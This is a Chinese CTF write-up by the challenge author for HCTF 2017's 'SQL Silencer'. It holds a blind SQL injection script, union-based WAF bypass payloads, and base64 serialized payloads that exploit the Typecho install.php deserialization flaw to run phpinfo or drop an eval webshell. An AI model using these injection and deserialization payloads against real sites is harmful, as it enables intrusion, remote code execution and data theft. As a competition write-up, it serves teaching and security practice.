2017HCTF-WriteupSQL Silencer
有些假過濾,簡化一下貼出注入部分最重要部分的代碼
function sql_check($sql){
if($sql < 1 || $sql > 3){
die('We only have 3 users.');
}
$check = preg_match('/&|_|\\+|or|,|and| |\\|\\||#|-|`|;|"|\\'|\\*|into|union([\\s\\S]+)select([\\s\\S]+)from/i',$sql);
if( $check ){
die("Nonono!");
} else {
return $sql;
}
}這道題其實是可以顯注的,各位有興趣的可以先去試試
然而由于是黑名單不全的原因,幾乎所有隊伍都是用盲注做出來的
當前數據庫有2個表,一個user,一個flag
user表里有3條數據,flag表里也有2條數據
所以有隊伍在子查詢中測試select(flag)from(flag)會返回there is nothing從而懷疑flag表不存在
因為數據庫中會報錯:ERROR 1242 (21000): Subquery returns more than 1 row
先說盲注吧,由于很多函數都沒禁用,盲注的方法有很多,隨便貼一個
由于3^1=2 -> Bob ,3^2=1 -> Alice, 3^0 -> Cc
看flag表中有多少行
id=3^(select(count(flag))from(flag))
返回Alice,確定flag表中只有2條數據
跑flag的poc:
`id=3^(select(count(1))from(flag)where(binary(flag)<0x30))`寫腳本直接跑就能跑出一個目錄名,由于flag表里中第一條數據是沒啥用的。給做題師傅們帶來了些困擾,有些抱歉。
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author = 'c014'
import requests
s = requests.session()
flag = ""
for i in xrange(100):
for j in range(33,128):
url = "http://sqls.2017.hctf.io/inde/index.php?id=3^(select(count(1))from(flag)where(binary(flag)<0x{}))".format((flag+chr(j)).encode('hex'))
r = s.get(url)
if 'Cc' not in r.text:
flag = flag + chr(j-1)
print '[+]flag:'+flag
break跑出目錄’./H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/‘后訪問/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/index.php發現搭的是typecho
可以拿前段時間的Typecho前臺getshell漏洞直接打
有兩種方法,一種是直接回顯命令執行,另一種是上傳shell
由于根目錄一般不會有可寫權限,所以我準備了一個uploads目錄,并且存在.DS_Store泄露
直接打的poc為
Url: http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/install.php?finish
Post: __typecho_config=YTo3OntzOjQ6Imhvc3QiO3M6OToibG9jYWxob3N0IjtzOjQ6InVzZXIiO3M6NjoieHh4eHh4IjtzOjc6ImNoYXJzZXQiO3M6NDoidXRmOCI7czo0OiJwb3J0IjtzOjQ6IjMzMDYiO3M6ODoiZGF0YWJhc2UiO3M6NzoidHlwZWNobyI7czo3OiJhZGFwdGVyIjtPOjEyOiJUeXBlY2hvX0ZlZWQiOjM6e3M6MTk6IgBUeXBlY2hvX0ZlZWQAX3R5cGUiO3M6NzoiUlNTIDIuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6NTp7czo0OiJsaW5rIjtzOjE6IjEiO3M6NToidGl0bGUiO3M6MToiMiI7czo0OiJkYXRlIjtpOjE1MDc3MjAyOTg7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO2k6LTE7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo3OiJwaHBpbmZvIjt9fXM6ODoiY2F0ZWdvcnkiO2E6MTp7aTowO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO2k6LTE7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo3OiJwaHBpbmZvIjt9fX19fXM6MTA6ImRhdGVGb3JtYXQiO047fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9
Referer: http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/install.php?finish=根據需求修改base64內容即可
上傳shell的poc為:
Url: http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/install.php?finish
Cookie: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjY6ImZpbGVfcHV0X2NvbnRlbnRzKCd1cGxvYWRzL2MwMTQucGhwJywgJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ==
Referer: http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/install.php即可在uploads目錄下創建一個名為c014.php的webshell
之后會發現命令執行的函數好像都沒有回顯,因為我基本上都禁用掉了
這里用php自帶的列目錄
$c = new DirectoryIterator("glob:///*");
foreach($c as $cc) {
echo $cc,"</br>";
}發現根目錄下有個 /flag_is_here 的文件夾
然后讀取這個文件夾下的內容,有一個flag文件
echo file_get_contents(‘/flag_is_here/flag’);
get flag~
這題我一開始是想考顯注繞過waf/union([\s\S]+)select([\s\S]+)from/i
貼一下我預期的顯注pocid=1=2|@c:=(select(1))union(select@c)
讀目錄的exp為:id=1=2|@c:=(select(flag)from(flag)where(flag<0x30))union(select@c)
